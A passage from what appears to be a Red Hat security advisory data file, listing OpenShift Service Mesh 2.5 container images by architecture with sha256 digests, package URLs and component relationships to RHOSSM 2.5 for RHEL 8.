"pkg:oci/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", 